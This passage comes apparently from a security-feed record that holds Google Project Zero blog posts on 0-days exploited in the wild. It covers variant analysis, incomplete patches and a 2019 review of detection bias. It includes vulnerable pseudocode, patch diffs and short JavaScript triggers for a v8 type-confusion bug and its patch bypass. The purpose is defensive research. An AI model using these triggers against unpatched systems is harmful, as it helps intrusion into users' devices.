spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). \n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. \n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. \n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize &lt;= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). [The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. \n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics-&gt;width = (FT_Int)imgWidth;\n\nmetrics-&gt;height = (FT_Int)imgHeight;\n\nmap-&gt;width = metrics-&gt;width;\n\nmap-&gt;rows = metrics-&gt;height;\n\nmap-&gt;pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap-&gt;pitch = map-&gt;width * 4;\n\nmap-&gt;num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map-&gt;rows &gt; 0x7FFF || map-&gt;width &gt; 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map-&gt;rows * map-&gt;pitch; &lt;- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth &gt; 0x7FFF || imgHeight &gt; 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics-&gt;width = (FT_UShort)imgWidth;\n\nmetrics-&gt;height = (FT_UShort)imgHeight;\n\nmap-&gt;width = metrics-&gt;width;\n\nmap-&gt;rows = metrics-&gt;height;\n\nmap-&gt;pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap-&gt;pitch = map-&gt;width * 4;\n\nmap-&gt;num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map-&gt;rows &gt; 0x7FFF || map-&gt;width &gt; 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] \n \n--- \n \nTo summarize: \n\n * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map-&gt;rows * map-&gt;pitch; calculation.\n * CVE-2020-15999 caused a buffer overflow by truncating metrics-&gt;width and metrics-&gt;height which are then used to calculate the size field, thus causing the size field to be too small.\n\nA fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow. \n\n## Apple Safari CVE-2020-27930\n\nThis vulnerability is slightly different than the rest in that while it\u2019s still a variant, it\u2019s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there\u2019s no true \u201cupstream\u201d. However when vulnerabilities were reported in Microsoft\u2019s, Apple\u2019s, or Adobe\u2019s fork, there is a possibility (though no guarantee) that it was also in the others.\n\nCVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft\u2019s implementation of Adobe\u2019s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack. \n\n[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple\u2019s implementation of Adobe\u2019s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write. \n\nSix years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There\u2019s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.\n\n# Exploited 0-days not properly fixed\u2026 \ud83d\ude2d\n\nThree vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor. \n\nProduct\n\n| \n\nVulnerability that was exploited in-the-wild\n\n| \n\n2nd patch \n \n---|---|--- \n \nInternet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2020-0968 \n \nGoogle Chrome\n\n| \n\nCVE-2019-13764*\n\n| \n\nCVE-2020-6383 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2020-17008/CVE-2021-1648 \n \n* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild \n \n## Internet Explorer JScript CVE-2020-0674\n\nIn the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn\u2019t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020. We show the trigger in the section above.\n\n## Google Chrome CVE-2019-13674\n\n[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That\u2019s when he realized that the patch didn\u2019t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei\u2019s blog post, \u201c[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\u201d. \n\nTo summarize, the vulnerability is a type confusion in Chrome\u2019s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8\u2019s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8\u2019s integer type is that it is not closed under addition meaning that adding two integers doesn\u2019t always result in an integer. An example of this is +Infinity + -Infinity = NaN. \n\nTherefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you\u2019re interested! \n\nfor (var i = -Infinity; i &lt; 0; i += Infinity) { } \n \n--- \n \n[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.\n\nvar increment = -Infinity;\n\nvar k = 0;\n\n// The initial loop value is 0 and the increment is -Infinity.\n\n// This is permissible because 0 + -Infinity = -Infinity, an integer.\n\nfor (var i = 0; i &lt; 1; i += increment) {\n\nif (i == -Infinity) {\n\n// Once the initial variable equals -Infinity (one loop through)\n\n// the increment is changed to +Infinity. -Infinity + +Infinity = NaN\n\nincrement = +Infinity;\n\n}\n\nif (++k &gt; 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nTo \u201crevive\u201d the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity. \n\nUnfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible \u201ctype confusions\u201d. Again, check out [Sergei\u2019s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you\u2019re interested in more details. \n\nThis is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it\u2019s important to work towards \u201ccorrect &amp; comprehensive\u201d patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don\u2019t find and detect all exploited 0-days and we certainly don\u2019t find them all in a timely manner. \n\n## Windows splwow64 CVE-2020-0986\n\nThis vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only[ disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). \n\nMicrosoft\u2019s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn\u2019t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.\n\n# Correct and comprehensive patches\n\nWe\u2019ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year. \n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes. \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.\n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nWhile the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.\n\nIn 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you\u2019re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)\n\nIn addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.\n", "modified": "2021-02-03T00:00:00", "published": "2021-02-03T00:00:00", "id": "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "href": "https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html", "type": "googleprojectzero", "title": "\nD\u00e9j\u00e0 vu-lnerability\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-14T19:22:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0703", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0880", "CVE-2019-1132", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-5786", "CVE-2019-7286", "CVE-2019-7287", "CVE-2020-0674"], "description": "Posted by Maddie Stone, Project Zero\n\n** \n**\n\nIn May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used \u201cin the wild\u201d and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we\u2019ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019. \n\n** \n**\n\nWhen I had the idea for this \u201cYear in Review\u201d blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there\u2019d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or\u2026 but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\n** \n**\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n \n\n\n[](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)\n\n \n\n\n** \n**\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\n** \n**\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n** \n**\n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. \n\n** \n**\n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)\n\n \n\n\n** \n**\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\n** \n**\n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\n** \n**\n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\n** \n**\n\nEven just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\n** \n**\n\nCVE\n\n| \n\nWindows 7 SP1\n\n| \n\nWindows 8.1\n\n| \n\nWindows 10\n\n| \n\nWin 10 1607\n\n| \n\nWIn 10 1703\n\n| \n\nWIn 10 1803\n\n| \n\nWin 10 1809\n\n| \n\nWin 10 1903\n\n| \n\nExploitation of Latest SW Release?\n\n| \n\nComponent \n \n---|---|---|---|---|---|---|---|---|---|--- \n \nCVE-2019-0676\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nIE \n \nCVE-2019-0808\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1809)\n\n| \n\nwin32k \n \nCVE-2019-0797\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExploitation Unlikely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0703\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nWindows SMB \n \nCVE-2019-0803\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0859\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0880\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nExp More Likely (1903)\n\n| \n\nsplwow64 \n \nCVE-2019-1132\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1903)\n\n| \n\nwin32k \n \nCVE-2019-1367\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1429\n\n| \n\nX\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1458\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n| \n| \n| \n\nN/A (1909)\n\n| \n\nwin32k \n \n** \n**\n\n## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\n** \n**\n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. \n\n** \n**\n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free\u2019s being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs 